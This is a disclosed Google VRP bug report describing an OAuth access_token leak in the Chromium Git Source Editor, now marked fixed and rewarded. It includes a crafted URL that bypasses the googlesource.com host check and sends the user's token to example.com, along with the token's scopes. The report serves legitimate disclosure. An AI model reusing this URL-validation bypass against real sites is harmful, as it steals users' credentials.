Skip to Content (Press Enter)
Google
Bug Hunters
access_token leak on https://edit.chromium.org/
Reported by:
NDevTK
Google VRP
triaged
11:31 | May 8, 2023
closed
03:38 | May 11, 2023
triaged
16:14 | May 11, 2023
accepted
06:54 | May 18, 2023
triaged
14:44 | May 18, 2023
accepted
08:35 | May 26, 2023
fixed
04:54 | Aug 31, 2023
reward decided
$7,500
Summary:
access_token leak on
https://edit.chromium.org/
Product:
Google
URL:
https://edit.chromium.org/edit?file=https%3A%2F%2Fandroid.googlesource.com%2Fexample.com%23.googlesource.com%2Fplatform%2Fbuild%2F%2Bshow%2Frefs%2Fheads%2Fmaster%2FChanges.md%27
Vulnerability type:
Sensitive data exposure
Details
When signed in to the Git Source Editor and going to the URL it sends your OAuth token to
https://example.com/?access_token=<TOKEN>
Normally URLs would be restricted to
*.googlesource.com
or
*.git.corp.google.com
This app seems to be owned by the Android Build Team
http://android-build.corp.google.com/
Attack scenario
Going to an attacker controlled URL leaks a token which looks to be the OAuth token for the trusted google app used for making changes to chromium and android.
The scope looks to be:
"email profile
https://www.googleapis.com/auth/userinfo.profile
openid
https://www.googleapis.com/auth/gerritcodereview
https://www.googleapis.com/auth/androidbuild.internal
https://www.googleapis.com/auth/userinfo.email"
maybe after loading the resource it could be "escalated" to XSS but that be a bit pointless.
登录
使用 Google 账号登录